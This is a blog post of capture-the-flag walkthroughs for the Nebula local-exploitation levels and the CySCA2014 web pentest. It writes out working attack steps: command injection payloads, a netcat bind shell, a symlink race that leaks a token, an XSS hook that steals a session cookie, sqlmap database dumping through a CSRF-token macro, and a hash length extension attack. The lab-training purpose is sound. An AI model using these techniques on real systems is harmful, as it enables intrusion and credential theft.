Exploit Exercises – Nebula

The Exploit Exercises website provides a number of virtual machines which can be downloaded, and each virtual machine provides the user with a different set of exploitation challenges. In this blog post we’ll take a look at the challenges provided in the Nebula virtual machine, which focus on local Linux exploits and source code vulnerabilities. Nebula consists of 20 challenges which get increasingly more difficult. At the time of writing I’ve only made it to challenge 11 and it looks like I’ll have to improve my coding abilities before I’ll be able to make it further. I’ll keep updating this blog post as I learn more and complete more challenges.



This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

Executing the command ‘find / -name flag00’ reveals an executable – flag00 – located in a hidden directory: /bin/…/. Executing this file elevates the user to the ‘flag00’ account, at which point the command ‘getflag’ can be executed.



There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the file is that the command ‘echo’ is executed using ‘/usr/bin/env’. Normally the ‘echo’ command refers to one specific application. Mine refers to ‘/bin/echoyou can find yours by typing ‘which echo’. However, by using ‘/usr/bin/env echo’ the operating system will actually look for the ‘echo’ application in the directories specified by the $PATH environment variable. This allows the attacker to modify the $PATH variable and provide a different ‘echo’ application to be executed.

The attacker can add their home folder to $PATH using the command PATH=/home/level01:$PATH. The home folder now appears in the $PATH variable before any of the other folders, meaning it is the first place where Linux will look. The attacker then adds a file called ‘echo’ with a command inside, such as /bin/getflag and makes the file executable using the command chmod 777 echo. Since the vulnerable program gets executed with the permissions of flag01, so does ‘/bin/getflag’.



There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the code is that it calls an environment variable that can be changed by the attacker, namely $USER. Normally, $USER holds the name of the current user account. When executing the program, it will echo “level02 is cool”:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo level02 is cool”)

level02 is cool

Using the command USER=”;getflag;echo” the attacker can inject lines into the code. The results are the following:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo ;getflag;echo is cool”)

You have successfully executed getflag on a target account

is cool



Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

The premise of this level is easy enough; a cronjob executes every couple of minutes and it will execute everything in the /home/flag03/writable.d’ directory. The attacker can create a file, make it executable, place it in the /home/flag03/writable.d directory and the command(s) will get executed. One thing to keep in mind is that even though you can trigger the job to run by executing /home/flag03/writable.sh this will not work because the job will execute with your (level03) permissions. You need to wait for the task to execute automatically so that it runs with flag03 permissions.

The issue is that the output of the commands will not appear in your shell, so you can’t see the results of successfully running the ‘getflag’ command. You can trust that the command ran successfully but this is a little anti-climactic. An alternative is that instead of just running ‘getflag’ you redirect the output results to a file, like so:

getflag > /tmp/output.txt.

Just make sure that the output gets saved in a location where flag03 has write permissions.

Of course, if you want to get a shell so that you can manually execute the ‘getflag‘ command there are ways to do that too. One way is to have the script open a local port with netcat and to assign a shell to anyone that connects, using the command:

nc.traditional –l –p 4444 –e /bin/bash.

You can then connect remotely to the port and you’ll be given a shell to the system with all the privileges of the flag03 account.



This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Source code for this challenge can be found here.

The source code for this challenge tells us that the vulnerable program will not open any file that has “token” in the name. The solution here was simple; since we cannot open any file with ‘token’ in the name, we create a hard link to the ‘token’ file with a different name using the command:

ln /home/flag04/token /home/level04/hardlink.

We can then execute the ‘flag04’ program on the hardlink, and it will actually run on the token file.

level04@nebula:/home/flag04$ ./flag04 /home/level04/hardlink

The content of the token file is actually the password to the flag04 account – something that we’ll see again in later challenges. This allows us to log in as flag04 and run the ‘getflag‘ command.




Check the flag05 home directory. You are looking for weak directory permissions.

Investigation of the ‘/home/flag05‘ folder shows that there are two hidden directories: ‘.ssh’ and ‘.backup’. The ‘.ssh’ directory typically contains private ssh keys. If we can get our hands on flag05’s private ssh key we should be able to establish an ssh session under flag05’s account without having to enter a password, as long as the private ssh key is not encrypted with a passphrase.

Unfortunately, the ‘/home/flag05/.ssh’ directory has restrictive permissions and the level05 account doesn’t have access to it. Let’s try the ‘/home/flag05/.backup’ directory instead. This directory has a gzipped file in it named ‘backup-19072011.tgz’. The directory and the file have weak permissions set, and the level05 account has access to them. We can copy the file over to our home directory, unzip it, and inspect it.

It turns out that backup file contains a copy of an RSA private key. We’ll continue under the assumption that this is the private key for flag05. It doesn’t specifically say that in the file, but since it was found in flag05’s home directory it is a safe assumption. We can proceed to copy the file over to our remote system using the following command:

scp backup-19072011 root@<IP ADDRESS>:/root/

In order to establish an ssh session without having to provide a password for flag05, we need to copy the private RSA key into ‘/root/.ssh/id_rsa’. Note that I’m logged into my system as root so that’s where the key goes. If you’re logged in as a different user, use the ‘.ssh’ folder under your home directory instead.

Before copying the private RSA key over, we need to remove some of the other information that was in the backup file. Specifically, everything that is not in between the following lines:





You may also want to create a backup of the ‘id_rsa‘ file that is already there on your system, so that you can restore it to how it was at a later stage.

cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bak

Once you copy the right content into ‘/root/.ssh/id_rsa’ you can then establish an ssh session under the flag05 account and you will not be prompted for a password:

root@kali:~# ssh flag05@<Exploit Exercises IP Address>

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

If you are getting an error message while trying to connect or if you are asked for a passphrase or password it means there is something wrong with the format of the ‘id_rsa’ file. Try establishing an ssh session using the ‘- v’ command for verbose output to troubleshoot the issue.



The flag06 account credentials came from a legacy unix system.

This level requires us to do some basic password cracking. The description for the level tells us we have to inspect flag06’s account credentials, which means we have to look at the ‘/etc/passwd‘ file. The password file clearly shows that the entry for flag06 is different from those for other accounts:

cat /etc/passwd


On old UNIX systems, a user’s password hash would be stored in the ‘/etc/passwd’ file, as is the case for flag06. To crack this hash, we simply copy the entry for flag06 over into a file on our system and run John the Ripper (a common password cracking tool) against it.

root@kali:~# john flag06.pwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello (flag06)
guesses: 1 time: 0:00:00:00 DONE (Sun Nov 16 10:07:08 2014) c/s: 39341 trying: 123456 – Pyramid
Use the “–show” option to display all of the cracked passwords reliably

The password is “hello”. We can now log ssh into the flag06 account and successfully execute the ‘getflag’ command.



The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

Source code for this challenge can be found here.

There are two files located in the ‘/home/flag07‘ directory: ‘index.cgi’ and ‘thttpd.conf’. The first is a simple Perl script and the second is a configuration file for a web server. Reading the configuration file reveals that the server is running on port 7007 and should be running under the ‘flag07’ user.

Using our remote system to connect to the web server it was determined that index.cgi is accessible to anyone, using the link:


 The Perl script can be invoked by passing an argument to index.cgi, such as http://<webserver>:7007/index.cgi?Host= The source code of the Perl script doesn’t seem to perform any input validation or sanitation, so we should be able to pass more than just a host address to it. By using a pipe, we can pass the script a system command that will also get executed:


This provided the message that ‘getflag’ was successfully executed on a target account.



World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

The folder ‘/home/flag08‘ contains a network capture file: ‘capture.pcap’. The easiest way to analyze a PCAP file is using Wireshark, but it’s not the only way. To use Wireshark, copy the PCAP file over to your remote system using the secure copy command (scp). You can also analyze the file on the local system, but instead of Wireshark you’ll have to use tcpdump. Tcpdump is what I’ll use in the walkthrough for this challenge.

tcpdump –qns 0 –X –r capture.pcap

The output won’t be particularly easy to read but once you know what you’re looking for it’s fairly straightforward. The first couple of packets can be ignored – these have to do with establishing the session. What we’re interested in comes after you see the following:

21:23:12.339391 IP > tcp 75

Note that I removed the hex code and only kept the ASCII for better legibility.

This packet shows that the user was trying to log into a service – there is a clear prompt for a username and password. The next couple of packets will show us the login name that the user entered. However, you won’t see one single packet with a username in it. Instead the traffic looks like telnet traffic, in which a single entered character is sent to the server and the server echoes it back to the user. Additionally, you have to know what part of the packet to look at. The following packets will demonstrate this:

21:23:24.491452 IP > tcp 1


21:23:24.496998 IP > tcp 2


21:23:24.591456 IP > tcp 1


21:23:24.597002 IP > tcp 2


As you can see, most of the information in the packets is not of interest to us. Only the last character is what the user actually entered in the command prompt, and this character is echoed back by the server. Going through the next few packets shows us that the user entered ‘level8’ as their username.

Skipping a few packets, we can then see the server prompting the user for a password:

21:23:26.095219 IP > tcp 13


The password was more difficult to decipher than the username was. First of all, the server doesn’t echo anything back like with the username, most likely as a security measure – you often don’t get to see the password as you’re typing it in so as to avoid someone shoulder surfing you. This is not necessarily an issue but it makes it a little bit harder to figure out what the user sent and what the server received.

The first part of the password was easy enough: ‘backdoor’. However, after backdoor there is a series of messages sent between the user and the server that doesn’t seem to contain anything, except some periods. Then there are a few more packets with legible characters: ‘00Rm8’. Then there are some more periods, and finally the user sends three more characters to the server: ‘ate’.

After going through the file a few more times, I finally deducted that what the user sent to the server in its entirety was: ‘backdoor…00Rm8.ate’. From that string, it’s easy to figure out that a period represents a backspace – the user made a couple of mistakes while typing in the password and corrected them. Therefore, the password that was sent to the server was ‘backd00Rmate’.

This password allows for logging in to the Nebula box as the flag08 account, at which point you can successfully execute the ‘getflag’ command.



There’s a C setuid wrapper for some vulnerable PHP code…

Source code for this challenge can be found here.

There are two files under ‘/home/flag09‘: an executable called ‘flag09’, and a PHP sourcecode file called ‘flag09.php’ which is called by ‘flag09’ when executed. The PHP script calls a function that takes two parameters from the command line, although it only actually uses the first one. The first parameter is supposed to be the path to a file. The contents of that file will be modified in the function according to some regex and then output to the screen.

The function uses the PHP built-in function ‘preg_replace()’ to modify how it outputs the file contents. If it encounters any lines that include the string “[email” it then calls another function – spam() – by use of the ‘/e’ modifier. The preg_replace() function with the ‘-e’ modifier leaves it open to potential exploitation. You can read about this vulnerability here: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace.

We have to do two things to exploit this vulnerability; we have to set the value of the ‘$use_me’ me variable and we have to call it inside of a file, while making sure that it gets executed when the spam() function is called. The first part is easy; the PHP script sets $use_me to whatever our second argument on the command line is. Then we have to call it. I created a file in ‘/home/level09‘ called “test.txt” and it contained the following string:

[email system($use_me)]

I then ran the ‘flag09’ file as follows:

/home/flag09/flag09 /home/level09/test.txt getflag.

The results:

level09@nebula:~$ System(getflag).

Apparently, I am successfully calling the $use_me variable, but the system command itself is not getting executed. In order for this command to be interpreted and executed as a system command, it has to be wrapped in curly braces. After some experimentation, the following syntax worked for me:

[email {${system($use_me)}}]

Again executing the flag09 program with the same command line arguments now resulted in the following:

level09@nebula:~$ /home/flag09/flag09 /home/level09/test.txt getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Despite an error thrown by the script because the code injection affects its interpretation of PHP code, the getflag command was successfully executed.



The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.

Source code for this challenge can be found here.

The source code for level 10 outlines a program that takes two command line arguments. The first one is a file path, and the second one is a host to send the file to. If the user has access to the file, the program writes the contents of it to port 18211 on the specified host.

There is also a ‘token’ file located in the flag10 home directory, but the ‘level10’ user doesn’t have read access to this file. It seems the challenge is to somehow exploit the program to provide us with access to the token file.

Inspection of the source code shows that it might be vulnerable to a “TOCTTOU” attack, which stands for “Time Of Check To Time Of Use”. Basically this vulnerability exists when a program first checks a condition, and then uses the result of this check at a later time. In the source code for this challenge, the program checks if the user has access to a file at line 24 and it opens the file for reading of its contents at line 54. Using a TOCTTOU attack means that a file is provided to the program that the user has access to so that the result of line 24 is “true”, and then swapping out the file for another file that the user doesn’t have access to (the token file) before line 54.

There are a couple of preparatory steps that need to be taken before attempting to exploit the program. First of all, a script needs to be run that continuously swaps out a file that we have access to with the token file. The easiest way to accomplish this is to create a symbolic link to a file and to have the script change the target of the symbolic link back and forth. The commands for this are:

Echo “testing token” > faketoken               #create fake token file

Ln –sf /home/level10/faketoken file          #create symbolic link named file and point to fake token file

Vi tocttouscript.sh                                          #create tocctou script


COUNT = 1;                                                      #create counter

While true                                                        #run forever


               Echo $COUNT;                                 # I like to echo counters on each run to make sure it’s running

               Ln –sf /home/flag10/token file;                  # switch out symbolic link target

               Ln –sf /home/level10/faketoken file;         # switch out symbolic link target

               COUNT=$((COUNT+1))                   #increase counter by one


So now we have the symbolic link and the shell script responsible for constantly changing out the target. We also need to set up a host to listen on port 18211 for the incoming file. I simply opened up a port with netcat on my remote system. The command for this is:

Ncat –l 18211 –keep-open

The ‘keep-open’ flag is important here because without it, the connection gets closed as soon as input is received. The TOCTTOU attack is somewhat of a trial and error attack – the swapping out of the files has to happen at the exact right moment (between the moment the access permissions are checked and the moment the result of the check is used) and this is unlikely to happen on the first occurrence. Numerous repeated attempts will be made until the timing is just right and everything lines up, so we want to make sure our host and port keep listening until that happens.

Now everything is in place to start the attack. The first thing to do is to start the script we wrote to start the swapping of the files that the symbolic link points to.


Next we want to execute the ‘flag’ program, but we don’t want to execute it just once. We want to execute it multiple times in a row because again – this exploit is somewhat of a trial and error process. To accomplish this we could write a second script and execute that, or we can simply execute a while-loop from the command line, where ‘<host>’ gets replaced with the IP address for your listening server:

While true; do /home/flag10/flag /home/level10/file <host>; done

Below is some of the information that I received on my open netcat connection:

root@kali:~# ncat -l 18211 –keep-open
.oO Oo.
testing token
.oO Oo.
testing token
.oO Oo.
.oO Oo.
.oO Oo.
testing token

As you can tell, the first two runs of the program did not coincide with the files being correctly swapped, but the next two runs did. The contents of the ‘token’ file seems to be “615a2ce1-b2b5-4c76-8eed-8aa5c4015c27”. Establishing another ssh connection from Kali to the Exploit Exercises box and authentication with username “flag10” and the token as password results in a successful login. We can now execute the ‘getflag’ command and complete this challenge.


That is as far as I’ve gotten so far with Exploit Exercises. As I complete more challenges, I’ll add more entries to this blog post.

Back to Top

CySCA2014 Web Application Pentest

CySCA2014 Write-Up

CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.

Web Application Pentest

Club Status

Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.


Solving this challenge was fairly straight-forward and easy. Firing up Burpsuite and setting up the web browser to use it as a proxy it quickly became clear that the website uses a cookie on the client machine with a parameter for ‘vip’ to determine if a user is a vip or not. Intercepting a request from the client to the server and changing the value from ‘vip=0’ to ‘vip=1’ granted access to the ‘blog’ section of the website and revealed the flag there.




For anyone new to Burpsuite, here’s some information that will make your life a little easier. You can add ‘match and replace’ rules using ‘Proxy’ -> ‘Options’ to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ in the future, so you don’t have to manually change it on each request. Even if you turn intercept off, the request will still be changed. As long as the rule is marked ‘enabled’ you will remain vip.


Om nom nom nom

Gain access to the Blog as a registered user to reveal the hidden flag.

Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.


There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.


Alright, so another method of becoming authenticated needs to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts. ‘Sycamore’ had last viewed one of his posts as recently as 37 seconds ago. Clearly there was an automated job set up on the Cysca box where this page was being refreshed regularly while being logged in as user Sycamore.


The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?

One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.

We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:

[<script src=””></script>(www.example.com)pwnt]

When viewing the blog entry, the comment only shows up as “pwnt”, but in the background the user’s browser is actually being redirected to, which ‘hooks’ it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from the cookie and use it instead of our own session ID. After doing so, we were successfully authenticated as ‘Sycamore’ and the second flag was shown on the screen.






Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.


Retrieve the hidden flag from the database.

This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access into the database. Here’s how we did it.

Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We found out by adding a single quote behind the comment_id value and looking at the server response.



Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.

First of all, the server responses to our SQL injection didn’t correspond to any write-ups of SQL attacks we could find. For instance, one of the first things that write-ups will tell you to do is figure out how many columns are in the table that you’re accessing. You can do this by adding a single quote to the parameter value and then adding “order by 10;–”, which should tell the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or it will give an error message such as “unknown column ‘10’ in ‘order clause’”. The latter indicates that there are less than 10 columns in the table, so then you have to narrow it down until the command goes through. However, when we tried the ‘order by’ SQL injection, we received the following response from the server:


The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.

We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.

The website blog section uses CSRF tokens to prevent cross site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every time a request is issued to the server, it has to include a valid CSRF token. The consequent server response includes a new CSRF token, which has to be issued with the next server request. A token is only valid once, and it is only valid for about 15-30 seconds. We’re not sure exactly of how long it’s valid for but if we waited too long in issuing a request to the server we would invariably get an “invalid CSRF token” error message.


We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you already tried most if not all of those same tactics and discovered they did not work. The key to success for us was provided through BurpSuite’s ability to run a macro for each incoming request. So basically what we did was tell BurpSuite that every time a server request was intercepted, it had to run a macro that would retrieve the latest CSRF token and to replace the original token with the new one before sending the request on to the server.

Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.



When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.



Now that the macro is set up, we need to create a session handling rule under ‘Options -> Sessions -> Session Handling Rules’. The rule has to specify to run our macro, under ‘rule actions’. You also have to set a scope for the rule, by clicking on the ‘scope’ tag. Here you will only select ‘proxy’ for when the rule will run, and for ‘URL scope’ you can either select ‘include all URLs’ or you can be more specific by selecting ‘use suite scope’. The latter requires you to go to ‘Target -> Scope’ and make sure you have the Cysca box’s URL defined as a target.





Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!

Alright, now it’s time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to BurpSuite as a proxy (–proxy).  The command for this is:

sqlmap -r <full path to request file> -p comment_id –proxy=

I would advise to do two things before running this command. (1) Enable intercepting on Burpsuite so that you can see the request that SQLmap is sending out to the server, and (2) go to ‘Options -> Session -> Session Handling Rules’ and click ‘open sessions tracer’. The sessions tracer shows the original incoming request, the macro that is ran, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a new one from the server for each request made. Notice that the SQL injection that is added to the ‘comment_id’ parameter is HTML encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren’t encoding our commands properly.

One more tip for this challenge; if you followed all of the steps described here and you are still having trouble performing SQL injection into the comment_id parameter, try running sqlmap with a delay on its requests (–delay = 1 for a 1 second delay). We ran into a situation where our macro was running as intended, and looking at the individual requests in the session tracer showed that Burpsuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when in the end, including a simple one-second delay in our SQLmap request fixed the issue. We’ve also been able to successfully run attacks against the server without this delay so it doesn’t seem to be required, but it’s just something that seemed to work for us when it wouldn’t work without the delay. We thought we’d include it in this walkthrough in case someone else experiences the same thing.





Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we need to enumerate all the databases on the server by using the ‘– dbs’ command. This will reveal that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we have to enumerate the tables in the cysca database. We can do this by specifying the database with ‘-D sysca’ and using the ‘– tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the information in the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘–dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.





Retrieve the hidden flag by gaining access to the caching control panel.

Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hoped that it would become clearer as we made progress.

We started on this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged into the ‘log’ file for the server under /usr/share/sqlmap/output.



The ‘users’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table provided GET, POST, and PUT requests that had been previously submitted to the server, including an API key for one user.

Our first attempt at making progress on this challenge was to try and crack the user passwords. Again, this was a waste of time as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say; running hashcat with multiple wordlists and rules did not result in any cracked passwords.

Next we decided to see if we could attack the site’s rest API. On the website’s blog there is a post made by Sycamore that refers to the rest API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.


The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid and signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and /or PUT requests to the server. We didn’t know how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we need to find a way to create valid API signatures.

The problem is that the calculation for an API signature includes a shared secret. Without the shared secret, it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature…. Bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.

Our thought process was as follows: We couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls including signatures from the database, we might be able to uncover the secret by recreating the known API call and using a wordlist to insert the secret into it. The assumption here is that we were unable to previously crack the passwords due to them being salted, but now we might be successful because the salt doesn’t come into play for the API signature.

We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, inserted an entry from a wordlist in front of it (as the secret), created an MD5 hash of the string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, then the two MD5 hash values should be the same. Of course, even after using several different wordlists (and waiting for long periods of time for the script to finish) we did not find the secret. So now we were somewhat at a loss. If we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t place valid API calls.

So we did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries one of us stumbled on something called a ‘length extension attack’. A length extension attack is something that can be used to calculate a valid hash when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.

Length extension attacks work due to a vulnerability in numerous hashing algorithms, including MD5. The vulnerability has to do with how these algorithms calculate a hash value. For instance, MD5 uses blocks of a specific length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits followed by the length of the string (the string being secret + message). So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing so that it looks like this:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”

So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.

Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put into words our understanding from what is explained in the two sources above in the hopes we don’t fuck it up too much. Basically, you can add information to the string that you want to include in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata” The length extension attack will not work if you simply add stuff to the original message. However, it WILL work if you include the padding, and then add additional information to the end of that. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:

“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61” The MD5 hashing algorithm will first calculate the hash for the first 512 bits (which will result in the hash that we already know) and it will use that value as a starting point for the calculation of the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret because otherwise we would not know how much padding to add to get to 512 bits. So let’s move on from the theory and look specifically at how we were able to implement the length extension attack.

As mentioned previously, we understood the gist of the length extension attack but we didn’t know enough about hashing algorithms or cryptography to execute this attack ourselves from scratch. Fortunately there are smarter people than us around who wrote tools to make such an attack a lot easier to do. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from Github. We ended up using HashPump so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.

To use HashPump it requires the following arguments: (1) original message, (2) original hash, (3) message / data to add, and (4) length of the original secret. We had three out of these four arguments – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that included the three variables we did know and incremented the value for ‘length of the original secret’ by one on each loop. At the end of each loop it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document and it would display the resulting server response. Please note that we didn’t get all the syntax and formatting correct in this script right away. Like everything else during Cysca2014 it took us several hours to write a script that did exactly what we wanted. For instance, figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of ‘secret’ was 16 characters.



So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new one for the appended data. So all we can do is add something to the end. We tried moving back directories (adding ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (adding ‘/../rest-api-v2.txt’) but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.

After more experimentation and Googling, we finally came across some helpful information. Ironically, this information was found on the Github page (https://github.com/bwall/HashPump) for the tool that we had been using all along – HashPump – driving home once again the importance of attention to detail and carefully going through documentation. Looking at their example of a length extension attack, the information that they append to the original request is actually a parameter that has already been assigned a value. The idea here is that the parameter is given the value that was assigned to it last, so by re-assigning a value to the parameter you can actually overwrite the original value without having to modify the original request. The screenshot below shows what that would look like in HashPump. We’re giving the ‘filepath’ parameter a new value. However, the server does not accept our new API signature as valid.


